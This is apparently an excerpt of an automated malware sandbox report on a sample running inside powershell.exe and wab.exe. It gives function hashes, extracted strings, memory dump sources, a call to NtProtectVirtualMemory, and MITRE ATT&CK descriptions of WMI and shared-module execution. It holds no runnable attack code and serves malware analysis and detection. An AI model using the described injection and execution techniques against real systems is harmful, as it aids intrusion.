Opcode Fuzzy Hash: 5fb0a20944eae9679a0046fbfae80bfa2b4ee2a9bc06aba023e05935ba64ccf9
Instruction Fuzzy Hash: 644125B4A005098FCB09CF58C194DAAFBB1FF48310B258599D815AB3A5C732FC51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 070413E8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c591d982a6bb8decd8a8d8dbe64c8f1f89b4528a7bc092bca8433c066605a93e
Instruction ID: c8b726f36cc6d416007a48a5b4b716a62a325f0fcf6a8b0e1ee3bfccace13947
Opcode Fuzzy Hash: c591d982a6bb8decd8a8d8dbe64c8f1f89b4528a7bc092bca8433c066605a93e
Instruction Fuzzy Hash: C42137F170031AA7DB745B6AD900B3BA6D69FC4710F248939A509CB384E9B6D8C58361

Uniqueness

Uniqueness Score: -1.00%

Function 0435B0E7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5ead1871fa66fd2d7c07c26a06ba7a09c45c9e9990b180fe1b2faecd8515d5
Instruction ID: 68209327ed2798b09dd8a034d66bfef62e0c13cfa7d3dc264f487e0bb8be55f1
Opcode Fuzzy Hash: dc5ead1871fa66fd2d7c07c26a06ba7a09c45c9e9990b180fe1b2faecd8515d5
Instruction Fuzzy Hash: F341C934A00209AFDB05DF98D984A9DFBB2FF88310F25C559E815AB365C731ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0435ADD0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dc9124e1884198e60a0195278921c5900319b638c41e68fc2c75cb062a644e
Instruction ID: 6c054844ffe8900c9961b8e4a62840b5d59671504b46dbc525858790b3906429
Opcode Fuzzy Hash: 05dc9124e1884198e60a0195278921c5900319b638c41e68fc2c75cb062a644e
Instruction Fuzzy Hash: D5311670A00609DFCB14DF99C5849AAFBF1FF48310B258699D859AB365C331FC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07041028 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8fd1af02e79388de410726a815abf9dd9e6e69a41fc8097af8592c18c5bbb17
Instruction ID: 3c9118c27f152b28b9d16de017f4afa0925c8309c23fd5aa1bc616e4440d28e6
Opcode Fuzzy Hash: d8fd1af02e79388de410726a815abf9dd9e6e69a41fc8097af8592c18c5bbb17
Instruction Fuzzy Hash: C12147F1D043499FCB149F7988442ADBBF4AF95200F2985BAD819EB352E7319D84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 070413CC Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd83053929b6f56d239690b302a59de9bc40178368ef1bc2fd4eb66a8a842
Instruction ID: 45cb80813446e575c5d19a81836dc5f4c0bf74de13294aa61deb44e91d8c7c86
Opcode Fuzzy Hash: 675dd83053929b6f56d239690b302a59de9bc40178368ef1bc2fd4eb66a8a842
Instruction Fuzzy Hash: BF21A9F0704389ABD7310B2688107367BE65FC6240F18857AA948CF3C6E5B4988483B1

Uniqueness

Uniqueness Score: -1.00%

Function 070411D8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec46688dbf6edcb07aadce535e7a67933701a8a1ce633c9db08a37e821cda192
Instruction ID: 49969ab88595bba867247afa0041bb2406d1ec41046976ccaec40f17108a86cc
Opcode Fuzzy Hash: ec46688dbf6edcb07aadce535e7a67933701a8a1ce633c9db08a37e821cda192
Instruction Fuzzy Hash: 420147B630021EDBC72457AAE50057BBBE99BC6222F14C63FD559CB210C632C896C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 0435B1F4 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45251d7ebd4d89d4cc30c96a5647e5dbe1aa13919abb92c790e892c9a7f1b393
Instruction ID: 393925d1995cd68499946efadd5be3610e7687795d10a265d5ddad79ec937464
Opcode Fuzzy Hash: 45251d7ebd4d89d4cc30c96a5647e5dbe1aa13919abb92c790e892c9a7f1b393
Instruction Fuzzy Hash: 94110734A00209AFDB45DF98D884E9DFBB2FF48310F289558E805AB365C771E982CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0099D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483019856.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509ed69884fa19917ffa6131fc18dc398a715c34ca52e28b835d6d326ce80f3d
Instruction ID: cc4ee1c7bd1aa0cc14b7cddbaad9ae2f2cce070f4b1550cd94cd181462119f3c
Opcode Fuzzy Hash: 509ed69884fa19917ffa6131fc18dc398a715c34ca52e28b835d6d326ce80f3d
Instruction Fuzzy Hash: 7601D67140A3449AEB108A2DCDC4B67FF9CEF45324F18C92AED484B246C679D941CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0099D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483019856.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b642b97ae6297f410924717f30e34bd6073a893321d4d4bec972ac9322906cba
Instruction ID: a4fc4290b2d9e71edeb4c9bc5c89549faae0a51c37b19078775d37fdc88b312a
Opcode Fuzzy Hash: b642b97ae6297f410924717f30e34bd6073a893321d4d4bec972ac9322906cba
Instruction Fuzzy Hash: 5901526100E3C05FD7124B258C94752BFB8EF53224F1DC1DBD9888F1A7C2695849C772

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07047438 Relevance: 16.7, Strings: 13, Instructions: 473COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704794A
$^q, xrefs: 07047956
4'^q, xrefs: 070476E5
}l, xrefs: 0704799B
tP^q, xrefs: 0704785C
4'^q, xrefs: 070474EE
$^q, xrefs: 070477CC
d5wk, xrefs: 070476B6
4'^q, xrefs: 070476EF
4'^q, xrefs: 070474E2
tP^q, xrefs: 07047868
$^q, xrefs: 0704791F
}l, xrefs: 0704798D

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$d5wk$tP^q$tP^q$$^q$$^q$$^q$$^q$}l$}l
API String ID: 0-1839267178
Opcode ID: 8b8879772778a9068790aa024f9a87af86600f062adeb06689bd045937511122
Instruction ID: 24a60dd3ee9963bba8c6553fce0b751721196d09ef822d83930193aab10f023e
Opcode Fuzzy Hash: 8b8879772778a9068790aa024f9a87af86600f062adeb06689bd045937511122
Instruction Fuzzy Hash: 59E165F1B443069FCB759A78890076ABBE6AFC2310F149ABAD455CF351DB31C849CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0704E855 Relevance: 14.0, Strings: 11, Instructions: 285COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704E8AD
tP^q, xrefs: 0704EA88
(dq, xrefs: 0704EAE5
tP^q, xrefs: 0704EA7C
(dq, xrefs: 0704EA42
(dq, xrefs: 0704EAA6
4'^q, xrefs: 0704EB54
tP^q, xrefs: 0704E98D
tP^q, xrefs: 0704E981
4'^q, xrefs: 0704EB60
(dq, xrefs: 0704EAB0

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
API String ID: 0-459999756
Opcode ID: 32dad24c1c21737c3cb43d3cbec12494b8af1a14c550f79c1e42780a51fa43ca
Instruction ID: 0700579d72f89bb52960206ea13d98d86af8f22a7b2ab8517304d5c0fd4e226b
Opcode Fuzzy Hash: 32dad24c1c21737c3cb43d3cbec12494b8af1a14c550f79c1e42780a51fa43ca
Instruction Fuzzy Hash: CBA1D5F1B001199FDB659F68C90466EBBE2BF84310F248A79E8059B395CB31ED45C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 07047A48 Relevance: 12.8, Strings: 10, Instructions: 326COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07047AC5
tP^q, xrefs: 07047AD1
$^q, xrefs: 07047A5A
}l, xrefs: 07047B3D
}l, xrefs: 07047B2F
$^q, xrefs: 07047A8C
4'^q, xrefs: 07047C49
4'^q, xrefs: 07047C55
$^q, xrefs: 07047A80
$^q, xrefs: 07047D2E

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$}l$}l
API String ID: 0-1609486564
Opcode ID: 23338f9a24d5753b4d41cbb0a0aea2d8cae13ffca31bb71614c6e4870b2655fc
Instruction ID: 56f7ee126f31f4b32ffeb89c2804d2b7f5ec4969190e18fd81ff89fb6d5f27a4
Opcode Fuzzy Hash: 23338f9a24d5753b4d41cbb0a0aea2d8cae13ffca31bb71614c6e4870b2655fc
Instruction Fuzzy Hash: 72A157F27043068FCB359A28890076ABBE6AFC2720F14897EE445CF391DB32D845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0704B3C8 Relevance: 6.6, Strings: 5, Instructions: 399COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0704B7E8
4'^q, xrefs: 0704B744
tLyk, xrefs: 0704B51B
-xk, xrefs: 0704BA69
x.xk, xrefs: 0704BA1B

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tLyk$x.xk$-xk
API String ID: 0-1698909105
Opcode ID: 34ff21050d194cada52320ef6828d0eb74d8e962095c185d8f965a2ffabf2842
Instruction ID: 187142496cb50771be09aecdf41426683ab67fe3bc3a2f9c3599670291e696d7
Opcode Fuzzy Hash: 34ff21050d194cada52320ef6828d0eb74d8e962095c185d8f965a2ffabf2842
Instruction Fuzzy Hash: 6D022CB4A102189FCB64DB28CA54BDEBBF2BF88304F1085A9D4096B755DB31ED85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 069C1838 Relevance: 6.6, Strings: 5, Instructions: 382COMMON

Download Yara Rule

Strings

$^q, xrefs: 069C1D5E
$^q, xrefs: 069C1D76
tP^q, xrefs: 069C1873
tP^q, xrefs: 069C1869
$^q, xrefs: 069C1D82

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-578306960
Opcode ID: fabb4dd8e497e6d638be5c1cb99db71907809df9c50e7263fe07b5c2a0aecddd
Instruction ID: 85a7c69d148e543a54f8175f3576d2c16143efd72944a80787f68f726a71b057
Opcode Fuzzy Hash: fabb4dd8e497e6d638be5c1cb99db71907809df9c50e7263fe07b5c2a0aecddd
Instruction Fuzzy Hash: B4D10830B002089FDB559F68D41066ABBE6EFC4320F24886EE8059F792DB32DD45CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0704EEDD Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704F142
$^q, xrefs: 0704EF84
tP^q, xrefs: 0704F082
$^q, xrefs: 0704EF63
4'^q, xrefs: 0704F1BA

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: a500d496d85407fd6f6e0305f8ca8c1f59a0171a3678afb9816322e147958589
Instruction ID: 8e27a510f3e766798fc10dd183ea616c19c172f858c747de3eaf1ccbd381865d
Opcode Fuzzy Hash: a500d496d85407fd6f6e0305f8ca8c1f59a0171a3678afb9816322e147958589
Instruction Fuzzy Hash: 4A61E4F0A0020BEFDB688E14C644BBA77F2BB85351F588675E8159B2A0D771FC85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0704EF26 Relevance: 6.4, Strings: 5, Instructions: 164COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704F142
$^q, xrefs: 0704EF84
tP^q, xrefs: 0704F082
$^q, xrefs: 0704EF63
4'^q, xrefs: 0704F1BA

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: c822fad5548d5f615a850e8be8e721964f97a1be32de91008eb1482d15a01880
Instruction ID: e96fd046411ba86cb2f21268e1b212cf589fd9ff35bf89e266a010abe00ff653
Opcode Fuzzy Hash: c822fad5548d5f615a850e8be8e721964f97a1be32de91008eb1482d15a01880
Instruction Fuzzy Hash: 5C51C1F0A0020BEFDB688E14CA44BAA77F1BB85341F588675E8119B2A1D771FD85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07040470 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0704056A
$^q, xrefs: 07040541
4'^q, xrefs: 0704055E
$^q, xrefs: 07040535
$^q, xrefs: 070404FC

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 61d2d1eb80cf04e0d9df7fec252c9e311dd0a704e8c787c8176e26bc632a51f1
Instruction ID: 1395b38abe2f9979775a8dcfa6e8df865c8cc156310ccff1752058f365f36bce
Opcode Fuzzy Hash: 61d2d1eb80cf04e0d9df7fec252c9e311dd0a704e8c787c8176e26bc632a51f1
Instruction Fuzzy Hash: 1341E7F0B04306DFCB655A7489106AF7BE1EFC2210F1485BADA05DB295EB36C945C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0704E335 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0704E3F1
4'^q, xrefs: 0704E3FD
$^q, xrefs: 0704E3D1
$^q, xrefs: 0704E3C5
$^q, xrefs: 0704E38B

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 087dac2c5cdb1f5f8408c944bbb361f7950beaf857103adf7bc2d2774fc643cc
Instruction ID: b26a9f4adb6447eba7c2678854d1126524a5c965a5bb4053d1e32eed3ba3505e
Opcode Fuzzy Hash: 087dac2c5cdb1f5f8408c944bbb361f7950beaf857103adf7bc2d2774fc643cc
Instruction Fuzzy Hash: 5A316BF2B04306CFCB664A79D80857AB7D5BFC2A12F2486BAC4568A245DE36C845C751

Uniqueness

Uniqueness Score: -1.00%

Function 069C0438 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

$^q, xrefs: 069C0450
$^q, xrefs: 069C046C
tP^q, xrefs: 069C04EC
$^q, xrefs: 069C04A7
$^q, xrefs: 069C0488

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 07553090913025054d6b1b83f8ad5aae6ca99d7479814b8b46432963e8397121
Instruction ID: b46b6c043aae7222d0d815f0476577221ee1715228c8e31ff05ee3708eeb6159
Opcode Fuzzy Hash: 07553090913025054d6b1b83f8ad5aae6ca99d7479814b8b46432963e8397121
Instruction Fuzzy Hash: 0D21C176E00218CFDB648E55C544A6BB7E8AFA4B30F24446EE9049F755EB32DD04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0704D9C8 Relevance: 5.5, Strings: 4, Instructions: 489COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0704DDF1
(o^q, xrefs: 0704DE01
(o^q, xrefs: 0704DAAE
(o^q, xrefs: 0704DABE

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: c7f2f7a68d218af73a7f719e46682f2ceaa87022faf0a372e614db311f53cc3c
Instruction ID: d8172e7f375d9bc50237c2c2229fff7dfe54a9bff3409940a61e34e50bd616f2
Opcode Fuzzy Hash: c7f2f7a68d218af73a7f719e46682f2ceaa87022faf0a372e614db311f53cc3c
Instruction Fuzzy Hash: ACF147F1704306DFCB659F69C81476ABBE2EF81310F14857AEA158B291DB31D845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04351CFC Relevance: 5.5, Strings: 4, Instructions: 465COMMON

Download Yara Rule

Strings

vn^, xrefs: 04351F71
dPrq, xrefs: 043521AC
^xk, xrefs: 04351F68
vn^, xrefs: 04351D71

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: ^xk$dPrq$vn^$vn^
API String ID: 0-4164044534
Opcode ID: b4944b648e08970a01d6590b28320dac9ebc679ac9989d4fe068678e0bb6d5fb
Instruction ID: 3bd005ba8cf7fb1b57793d6299912714f7b668f0eacabe8f7a327027bf43cd2e
Opcode Fuzzy Hash: b4944b648e08970a01d6590b28320dac9ebc679ac9989d4fe068678e0bb6d5fb
Instruction Fuzzy Hash: 1AF1BC9285FBE11FE713AB38A9B45957FB09D5322471A14D3C4C0CF0B3E549A98DC3AA

Uniqueness

Uniqueness Score: -1.00%

Function 069C12C0 Relevance: 5.4, Strings: 4, Instructions: 422COMMON

Download Yara Rule

Strings

4'^q, xrefs: 069C168D
4'^q, xrefs: 069C135A
4'^q, xrefs: 069C1699
4'^q, xrefs: 069C1350

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 1d9decb27f50051e0ffc8ee36b8e149f74474252eb51f70380d02ff458e4173e
Instruction ID: 7c7c943c76d96774da5acc2e592269dee717627d5aea300af49f9ec6b52edfdf
Opcode Fuzzy Hash: 1d9decb27f50051e0ffc8ee36b8e149f74474252eb51f70380d02ff458e4173e
Instruction Fuzzy Hash: FFD13931B042458FD7659B69C51066ABBEAAFC1230B2888BFD405CBB57DB32CC45C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 069C275A Relevance: 5.3, Strings: 4, Instructions: 324COMMON

Download Yara Rule

Strings

tP^q, xrefs: 069C2897
tP^q, xrefs: 069C29C4
tP^q, xrefs: 069C29B8
tP^q, xrefs: 069C28A3

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$tP^q$tP^q
API String ID: 0-91886675
Opcode ID: c1a002be27b87be98182c9fef885c953043bc512a84c2c56431bc0e99dbd292d
Instruction ID: 8d8ab5f6f210db9b58d47abddc10f9bd594fe1975b927dddb9346ef87910f32b
Opcode Fuzzy Hash: c1a002be27b87be98182c9fef885c953043bc512a84c2c56431bc0e99dbd292d
Instruction Fuzzy Hash: 65C1A335F002099FDB54DF68C554A6ABBE6FB88720F248869E8019F750DB31DD45CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0704F2B0 Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704F32D
XRcq, xrefs: 0704F445
tP^q, xrefs: 0704F3B4
XRcq, xrefs: 0704F311

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: XRcq$XRcq$tP^q$$^q
API String ID: 0-3596674671
Opcode ID: 3d51739bf23562919c1afdb590ca6210f5c23ddbcdf1a666a03dddb5030b3092
Instruction ID: a2559f2bd7b3799dd56d692282d47aad855bde7a94ef366bdd6a90cdfcbf7ccf
Opcode Fuzzy Hash: 3d51739bf23562919c1afdb590ca6210f5c23ddbcdf1a666a03dddb5030b3092
Instruction Fuzzy Hash: D641A3F1A00207DBDB64CE19C244A6AB7F2AF85711F2DC2B9E814AB255C771FD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0704AA24 Relevance: 5.1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704AAF7
$^q, xrefs: 0704AADB
$^q, xrefs: 0704AA97
$^q, xrefs: 0704AAB3

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 371912de3ef0f5fff7d138e0acfd4d12aa0101e2e828c9d0efc483a343637908
Instruction ID: 0dc7145e72a6b03dd660063653051eadcce7bb567bee76c53c83741cfd9120ed
Opcode Fuzzy Hash: 371912de3ef0f5fff7d138e0acfd4d12aa0101e2e828c9d0efc483a343637908
Instruction Fuzzy Hash: B131F1F7B8420ADFDB648E61CA016AAB7F1EB82221F14C27BD8658B242D7318555CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 07049668 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 070496D0
$^q, xrefs: 070496C4
$^q, xrefs: 0704967A
$^q, xrefs: 07049696

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: d1e75586ff6100cc72b45015b43c71bf21ed56b0e5e69d538cf7bf6b8dd33012
Instruction ID: 6d7a6c2a6f6291b559ac37fc270db86715ad5fdf5e202fb14b1f684c1cb9457d
Opcode Fuzzy Hash: d1e75586ff6100cc72b45015b43c71bf21ed56b0e5e69d538cf7bf6b8dd33012
Instruction Fuzzy Hash: 00217DF132030A6BDB74996A9C00B2BB6D66FC1710F24893AE409CF385DD76F844C360

Uniqueness

Uniqueness Score: -1.00%

Function 07040308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$^q, xrefs: 07040352
4'^q, xrefs: 07040373
4'^q, xrefs: 0704037F
$^q, xrefs: 0704035E

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 5957b4b7471ec428882149aac36a625441c7b24801987b3922cd795789080423
Instruction ID: d7ff50415910e5e12fe554fa12431c11965f67e24cd4a06842bcf945d62e0054
Opcode Fuzzy Hash: 5957b4b7471ec428882149aac36a625441c7b24801987b3922cd795789080423
Instruction Fuzzy Hash: 8101F7A07093866FC73A422859246696FF66FC3601B198AFBD040DF357CE158C49C3A3

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wab.exePID: 7188, Parent PID: 7764COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 082CAD3D Relevance: 3.1, APIs: 2, Instructions: 61
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 082CADAC
NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 082CADEF

Memory Dump Source

Source File: 00000009.00000002.4107392324.0000000007D30000.00000040.00000400.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7d30000_wab.jbxd

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 5a5076daf8b6331ce082d9166c0cdd03f4fa7de8a5b42f010fe0e41a4e1e81ae
Instruction ID: dc4aec1374193221c42dd75d49f5e5d70bb5846eb963124a37dce30b94c2fb74
Opcode Fuzzy Hash: 5a5076daf8b6331ce082d9166c0cdd03f4fa7de8a5b42f010fe0e41a4e1e81ae
Instruction Fuzzy Hash: 871103F65503159FD7009A24D98CB9A77B1AF24366F858248DC825B1E1D3798885CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

